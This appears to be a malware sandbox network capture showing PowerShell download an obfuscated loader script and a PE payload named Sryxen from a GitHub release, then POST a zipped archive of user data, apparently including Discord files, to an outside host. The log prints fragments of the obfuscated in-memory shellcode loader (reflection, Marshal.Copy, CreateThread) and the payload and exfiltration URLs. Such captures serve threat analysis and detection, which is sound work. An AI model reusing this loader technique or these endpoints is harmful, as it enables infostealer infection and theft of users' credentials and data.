                                                                            2024-12-03 14:26:55 UTC3378INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549705185.199.109.1334436112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 14:26:56 UTC650OUTGET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241203T142654Z&X-Amz-Expires=300&X-Amz-Signature=489e3c2eced019fad27973c10618a9efce0574e42ef117f630590362dbc09acf&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: objects.githubusercontent.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-03 14:26:57 UTC848INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 3418
                                                                            Content-Type: application/octet-stream
                                                                            Last-Modified: Thu, 07 Nov 2024 20:29:49 GMT
                                                                            ETag: "0x8DCFF6AED64A11E"
                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                            x-ms-request-id: d9db7332-701e-0052-1253-319dbd000000
                                                                            x-ms-version: 2024-08-04
                                                                            x-ms-creation-time: Thu, 07 Nov 2024 20:29:49 GMT
                                                                            x-ms-blob-content-md5: aXiAyvuBlhXMnGlrTXMY2w==
                                                                            x-ms-lease-status: unlocked
                                                                            x-ms-lease-state: available
                                                                            x-ms-blob-type: BlockBlob
                                                                            Content-Disposition: attachment; filename=sryxen_loader.ps1
                                                                            x-ms-server-encrypted: true
                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                            Fastly-Restarts: 1
                                                                            Accept-Ranges: bytes
                                                                            Age: 0
                                                                            Date: Tue, 03 Dec 2024 14:26:57 GMT
                                                                            X-Served-By: cache-iad-kiad7000095-IAD, cache-nyc-kteb1890073-NYC
                                                                            X-Cache: HIT, MISS
                                                                            X-Cache-Hits: 164, 0
                                                                            X-Timer: S1733236017.005410,VS0,VE14
                                                                            2024-12-03 14:26:57 UTC1378INData Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 28 27 53 69 6c 27 2b 27 65 6e 74 27 2b 27 6c 27 2b 27 79 43 6f 6e 74 69 6e 75 27 2b 27 65 27 29 0d 0a 66 75 6e 63 74 69 6f 6e 20 53 72 79 78 65 6e 4c 6f 61 64 65 72 20 7b 0d 0a 20 20 20 20 50 61 72 61 6d 20 28 24 6d 6f 64 2c 20 24 66 63 65 29 0d 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 60 52 60 52 65 60 4e 54 64 4f 4d 61 49 6e 22 2e 28 28 27 47 45 27 2b 27 54 27 29 2b 28 27 61 73 27 2b 27 53 27 29 2b 28 27 45 6d 42 4c 49 65 27 2b 27 53 27 29 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 6c 4f 60 42 61 4c 61 73 53 60 65 4d 42 4c 59 60 43 60 41 63 68 45 22 20 2d 61 6e 64 20 24 5f 2e 22 6c 6f 60 43 61 60 54 49 6f 4e 22 2e
                                                                            Data Ascii: $ProgressPreference = ('Sil'+'ent'+'l'+'yContinu'+'e')function SryxenLoader { Param ($mod, $fce) $assem = ([AppDomain]::"cU`R`Re`NTdOMaIn".(('GE'+'T')+('as'+'S')+('EmBLIe'+'S')).Invoke() | ? { $_."GlO`BaLasS`eMBLY`C`AchE" -and $_."lo`Ca`TIoN".
                                                                            2024-12-03 14:26:57 UTC1378INData Raw: 27 65 66 6c 65 63 74 27 2b 27 65 64 44 65 6c 65 67 61 74 27 2b 27 65 27 29 29 29 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 2e 41 73 73 65 6d 62 6c 79 42 75 69 6c 64 65 72 41 63 63 65 73 73 5d 3a 3a 22 72 60 55 4e 22 29 2e 28 27 44 45 27 2b 28 27 66 69 6e 65 64 79 27 2b 27 6e 41 27 29 2b 28 27 4d 69 63 6d 27 2b 27 4f 27 29 2b 27 64 55 27 2b 27 6c 45 27 29 2e 49 6e 76 6f 6b 65 28 28 27 49 27 2b 27 6e 4d 65 6d 27 2b 27 6f 72 79 4d 27 2b 27 6f 64 27 2b 27 75 6c 65 27 29 2c 20 24 66 61 6c 73 65 29 2e 28 28 27 64 45 46 27 2b 27 69 6e 27 29 2b 27 65 27 2b 28 27 54 79 27 2b 27 70 45 27 29 29 2e 49 6e 76 6f 6b 65 28 28 27 4d 79 44 27 2b 27 65 6c 65 67 61 74 65 54 79 27 2b 27 70 27 2b 27 65 27 29 2c 20 28 27 43 6c 27 2b 27 61 73 27
                                                                            Data Ascii: 'eflect'+'edDelegat'+'e'))), [System.Reflection.Emit.AssemblyBuilderAccess]::"r`UN").('DE'+('finedy'+'nA')+('Micm'+'O')+'dU'+'lE').Invoke(('I'+'nMem'+'oryM'+'od'+'ule'), $false).(('dEF'+'in')+'e'+('Ty'+'pE')).Invoke(('MyD'+'elegateTy'+'p'+'e'), ('Cl'+'as'
                                                                            2024-12-03 14:26:57 UTC662INData Raw: 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 43 6f 27 2b 27 70 59 27 29 2e 49 6e 76 6f 6b 65 28 24 73 72 79 78 65 6e 2c 20 30 2c 20 24 6c 70 4d 65 6d 2c 20 24 73 72 79 78 65 6e 2e 22 4c 65 60 4e 60 47 74 48 22 29 0d 0a 24 68 54 68 72 65 61 64 20 3d 20 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 67 65 27 2b 28 27 54 64 65 27 2b 27 4c 27 29 2b 28 27 45 27 2b 27 67 61 74 45 27 29 2b 27 46 6f 27 2b 27 52 27 2b 28 27 66 75 6e 63 27 2b 27 54 49 27 2b 27 6f 4e 70 27 29 2b 27 6f 69 27 2b 27 4e 54 27 2b 27 65 52 27 29 2e 49 6e 76 6f 6b 65 28 28 53 72 79 78 65 6e 4c 6f 61 64 65 72 20 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 20 43 72 65 61 74 65 54 68 72 65 61 64 29 2c 20 28 64 65 6c 67
                                                                            Data Ascii: s.Marshal]::('Co'+'pY').Invoke($sryxen, 0, $lpMem, $sryxen."Le`N`GtH")$hThread = [System.Runtime.InteropServices.Marshal]::('ge'+('Tde'+'L')+('E'+'gatE')+'Fo'+'R'+('func'+'TI'+'oNp')+'oi'+'NT'+'eR').Invoke((SryxenLoader kernel32.dll CreateThread), (delg


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.54970620.233.83.1454436112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 14:26:59 UTC191OUTGET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: github.com
                                                                            2024-12-03 14:26:59 UTC962INHTTP/1.1 302 Found
                                                                            Server: GitHub.com
                                                                            Date: Tue, 03 Dec 2024 14:26:59 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                            Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241203T142659Z&X-Amz-Expires=300&X-Amz-Signature=6e528fc71a8cc27f1a71a4e3622cf4755a8b242d62f836013ff1a5f2e9f61272&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream
                                                                            Cache-Control: no-cache
                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                            X-Frame-Options: deny
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 0
                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                            2024-12-03 14:26:59 UTC3378INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.549707185.199.109.1334436112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 14:27:01 UTC624OUTGET /github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241203T142659Z&X-Amz-Expires=300&X-Amz-Signature=6e528fc71a8cc27f1a71a4e3622cf4755a8b242d62f836013ff1a5f2e9f61272&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: objects.githubusercontent.com
                                                                            2024-12-03 14:27:01 UTC799INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 9790976
                                                                            Content-Type: application/octet-stream
                                                                            Last-Modified: Tue, 26 Nov 2024 19:52:15 GMT
                                                                            ETag: "0x8DD0E53D3A2D426"
                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                            x-ms-request-id: 08ba3fa6-301e-0053-7a86-44c261000000
                                                                            x-ms-version: 2024-08-04
                                                                            x-ms-creation-time: Tue, 26 Nov 2024 19:52:15 GMT
                                                                            x-ms-lease-status: unlocked
                                                                            x-ms-lease-state: available
                                                                            x-ms-blob-type: BlockBlob
                                                                            Content-Disposition: attachment; filename=SryxenBuilt.bin
                                                                            x-ms-server-encrypted: true
                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                            Fastly-Restarts: 1
                                                                            Accept-Ranges: bytes
                                                                            Age: 776
                                                                            Date: Tue, 03 Dec 2024 14:27:01 GMT
                                                                            X-Served-By: cache-iad-kjyo7100021-IAD, cache-ewr-kewr1740045-EWR
                                                                            X-Cache: HIT, HIT
                                                                            X-Cache-Hits: 16, 0
                                                                            X-Timer: S1733236021.480855,VS0,VE1
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 60 95 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 00 00 00 00 00 a2 8b 00 00 00 00 00 f0 00 22 00 0b 02 03 00 00 ee 49 00 00 ee 04 00 00 00 00 00 e0 22 07 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 10 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 95 00 00 06 00 00 00 00 00 00 03 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                            Data Ascii: MZERYHHH`!L!This program cannot be run in DOS mode.$PEd"I"@``
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 00 48 8d 04 d8 48 83 c4 10 5d c3 48 8d 05 68 3d 4c 00 48 8d 1d 21 24 59 00 90 e8 1b cf 03 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 e6 de 06 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 84 00 48 89 d9 48 c1 fb 3f 48 c1 eb 3d 48 8d 14 19 48 89 d3 48 c1 fa 03 48 83 e3 f8 48 29 d9 0f b6 1c 10 48 85 c9 7c 16 be 01 00 00 00 d3 e6 48 83 f9 20 19 ff 21 fe 09 f3 88 1c 10 5d c3 e8 39 c1 03 00 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 84 00 48 89 d9 48 c1 fb 3f 48 c1 eb 3d 48 8d 14 19 48 89 d3 48 c1 fa 03 48 83 e3 f8 48 29 d9 0f b6 14 10 48 85 c9 7c 16 bb 01 00 00 00 d3 e3 48 83 f9 20 19 f6 21 f3 84 d3 0f 95 c0 5d c3 e8 d9 c0
                                                                            Data Ascii: HH]Hh=LH!$YHD$H\$HL$HD$H\$HL$UHHH?H=HHHHH)H|H !]9UHHH?H=HHHHH)H|H !]
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 48 83 c0 48 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 40 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 50 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 58 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 38 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 50 48 83 c4 08 5d c3 48 8b 44 24 18 48 83 c0 30 48 83 c4 08 5d c3 31 c0 48 83 c4 08 5d c3 48 89 44 24 08 e8 24 d9 06 00 48 8b 44 24 08 e9 1a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 91 00 00 00 55 48 89 e5 48 83 ec 08 48 89 44 24 18 e8 64 fc ff ff 0f 1f 40 00 48 83 f8 12 77 2a 48 83 f8 11 74 15 48 83 f8 12 75 34 48 8b 4c 24 18 48 8b 41 30 48 83 c4 08 5d c3 48 8b 4c 24 18 48
                                                                            Data Ascii: HHH]HD$H@H]HD$H8H]HD$HPH]HD$HXH]HD$H8H]HD$H8H]HD$HPH]HD$H0H]1H]HD$$HD$I;fUHHHD$d@Hw*HtHu4HL$HA0H]HL$H
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 48 83 ec 08 48 89 5c 24 20 e8 c8 00 00 00 48 8b 4c 24 20 48 8b 04 c8 48 83 c4 08 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 2a d4 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5b 55 48 89 e5 48 83 ec 20 0f b6 50 14 f6 c2 01 bb 38 00 00 00 ba 48 00 00 00 48 0f 45 da 66 83 78 30 00 75 0d 31 c0 31 db 48 89 d9 48 83 c4 20 5d c3 48 89 44 24 30 48 8d 0d d1 8b 53 00 bf 0d 00 00 00 e8 b3 f8 ff ff 84 00 48 8b 54 24 30 0f b7 4a 30 48 89 cb 48 83 c4 20 5d c3 48 89 44 24 08 e8 95 d3 06 00 48 8b 44 24 08 eb 8e cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 94 00 00 00 55 48 89 e5 48 83 ec 28 48 89 44 24 38 e8 e4 fe ff ff 0f 1f 40 00 66 85 c0 75 0d 31 c0 31 db
                                                                            Data Ascii: HH\$ HL$ HH]HD$H\$*HD$H\$I;fv[UHH P8HHEfx0u11HH ]HD$0HSHT$0J0HH ]HD$HD$I;fUHH(HD$8@fu11
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 5d c3 48 8b 44 24 38 bb 01 00 00 00 e8 a3 fd ff ff 48 89 44 24 30 48 89 5c 24 28 48 8d 0c 03 48 8d 49 01 48 8b 44 24 38 48 89 cb e8 84 fd ff ff 48 89 5c 24 20 48 8b 4c 24 30 48 8b 54 24 28 48 01 d1 48 8d 0c 01 48 8d 49 01 48 8b 44 24 38 bf 10 00 00 00 48 89 cb 48 8d 0d a7 9c 53 00 e8 31 fc ff ff 48 8b 5c 24 20 48 85 db 7c 21 48 89 c1 48 f7 d9 90 48 39 cb 77 06 48 83 c4 40 5d c3 48 85 c0 74 05 e8 8b 5b 06 00 e8 c6 5b 06 00 e8 81 5b 06 00 90 48 89 44 24 08 e8 56 ce 06 00 48 8b 44 24 08 e9 2c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 4c 8d 64 24 f0 4d 3b 66 10 0f 86 46 03 00 00 55 48 89 e5 48 81 ec 88 00 00 00 48 89 84 24 98 00 00 00 48 89 8c 24 a8 00 00 00 48 81 fb 00 00 00 20 0f 8d dd 02 00 00 66 0f 1f 84 00 00 00 00 00 48 81 ff 00 00 00 20 0f 8d 89 02
                                                                            Data Ascii: ]HD$8HD$0H\$(HHIHD$8HH\$ HL$0HT$(HHHIHD$8HHS1H\$ H|!HHH9wH@]Ht[[[HD$VHD$,Ld$M;fFUHHH$H$H fH
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 e2 f2 ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 52 c9 06 00 48 8b 44 24 08 eb cb 4c 8d 6c 24 18 66 0f 1f 44 00 00 4d 39 2c 24 75 d1 49 89 24 24 eb cb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 e2 f1 ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 f2 c8 06 00 48 8b 44 24 08 eb cb 4c 8d 6c 24 18 66 0f 1f 44 00 00 4d 39 2c 24 75 d1 49 89 24 24 eb cb cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 1e 55 48 89 e5 48 83 ec 08 4d 8b 66 20 4d 85 e4 75 1e 84 00 e8 22 ec ff ff 48 83 c4 08 5d c3 48 89 44 24 08 e8 92 c8 06
                                                                            Data Ascii: I;fvUHHMf MuH]HD$RHD$Ll$fDM9,$uI$$I;fvUHHMf MuH]HD$HD$Ll$fDM9,$uI$$I;fvUHHMf Mu"H]HD$
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: cc d9 03 00 48 8b 74 24 50 48 8b 7c 24 78 66 90 e9 dd fd ff ff 48 8b 05 b4 bc 88 00 48 8b 0d b5 bc 88 00 eb 0b 48 83 c0 20 48 ff c9 0f 1f 40 00 48 85 c9 0f 8e 88 00 00 00 80 78 18 00 74 e6 0f b6 50 19 48 8b 58 10 84 d2 74 6f 80 3b 00 66 90 75 68 48 89 4c 24 50 48 89 44 24 70 48 8b 08 48 89 4c 24 78 48 8b 50 08 48 89 54 24 48 0f 1f 00 e8 fb d8 03 00 48 8d 05 7a f4 53 00 bb 19 00 00 00 e8 2a e1 03 00 48 8b 44 24 78 48 8b 5c 24 48 e8 1b e1 03 00 48 8d 05 64 de 53 00 bb 17 00 00 00 e8 0a e1 03 00 e8 25 d9 03 00 48 8b 44 24 70 48 8b 4c 24 50 e9 6b ff ff ff 88 13 e9 64 ff ff ff 48 83 ec 80 5d c3 49 8d 40 01 0f 1f 44 00 00 48 39 d0 0f 8d 80 00 00 00 49 89 c0 48 c1 e0 05 4c 8b 0d e9 bb 88 00 49 8b 4c 01 08 4d 8b 0c 01 48 39 f1 75 d2 4c 89 44 24 40 48 89 44 24 38
                                                                            Data Ascii: Ht$PH|$xfHHH H@HxtPHXto;fuhHL$PHD$pHHL$xHPHT$HHzS*HD$xH\$HHdS%HD$pHL$PkdH]I@DH9IHLILMH9uLD$@HD$8
                                                                            2024-12-03 14:27:01 UTC1378INData Raw: 21 4e 8b 8c 02 80 00 00 00 0f 1f 44 00 00 e8 fb dd 06 00 4d 89 0b 4e 8b 8c 02 90 00 00 00 4d 89 4b 08 4c 8d 0d 32 42 53 00 4e 89 8c 02 80 00 00 00 4c 8d 0d e7 5e 91 00 4e 89 8c 02 90 00 00 00 83 f8 03 0f 8d 07 02 00 00 48 8b 0d 2e b7 88 00 48 8b 1d 1f b7 88 00 48 83 c3 05 48 8b 15 0c b7 88 00 48 39 d9 73 48 48 89 d0 bf 05 00 00 00 48 8d 35 b8 c6 50 00 e8 93 0d 05 00 48 89 0d fc b6 88 00 83 3d 95 4e 91 00 00 74 16 0f 1f 00 e8 7b dd 06 00 49 89 03 48 8b 15 d1 b6 88 00 49 89 53 08 48 89 05 c6 b6 88 00 48 89 c2 8b 44 24 48 48 89 1d c0 b6 88 00 4c 8d 43 fb 49 c1 e0 05 4a c7 44 02 08 03 00 00 00 42 c6 44 02 18 00 42 c6 44 02 19 00 83 3d 44 4e 91 00 00 74 15 4e 8b 0c 02 e8 29 dd 06 00 4d 89 0b 4e 8b 4c 02 10 4d 89 4b 08 4c 8d 0d 6a 3c 53 00 4e 89 0c 02 4c 8d 0d
                                                                            Data Ascii: !NDMNMKL2BSNL^NH.HHHH9sHHH5PH=Nt{IHISHHD$HHLCIJDBDBD=DNtN)MNLMKLj<SNL


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.549756107.180.236.2114436112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 14:27:27 UTC231OUTPOST / HTTP/1.1
                                                                            Host: sigma.dreamhosters.com
                                                                            User-Agent: Go-http-client/1.1
                                                                            Content-Length: 946
                                                                            Content-Type: multipart/form-data; boundary=101f6c242fe07287879a3d0bf57ae21a51eb17df40acf0b756a595d07d0e
                                                                            Accept-Encoding: gzip
                                                                            2024-12-03 14:27:27 UTC946OUTData Raw: 2d 2d 31 30 31 66 36 63 32 34 32 66 65 30 37 32 38 37 38 37 39 61 33 64 30 62 66 35 37 61 65 32 31 61 35 31 65 62 31 37 64 66 34 30 61 63 66 30 62 37 35 36 61 35 39 35 64 30 37 64 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 61 6c 66 6f 6e 73 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 5c 5c 61 6c 66 6f 6e 73 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 08 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 64 69 73 63 6f 72 64 5f
                                                                            Data Ascii: --101f6c242fe07287879a3d0bf57ae21a51eb17df40acf0b756a595d07d0eContent-Disposition: form-data; name="file"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\\\user.zip"Content-Type: application/octet-streamPKdiscord_
                                                                            2024-12-03 14:27:28 UTC276INHTTP/1.1 200 OK
                                                                            Date: Tue, 03 Dec 2024 14:27:27 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2
                                                                            Connection: Upgrade, close
                                                                            Cache-Control: max-age=600
                                                                            Expires: Tue, 03 Dec 2024 14:37:27 GMT
                                                                            Vary: Accept-Encoding,User-Agent
                                                                            Content-Length: 114
                                                                            Content-Type: text/html; charset=UTF-8
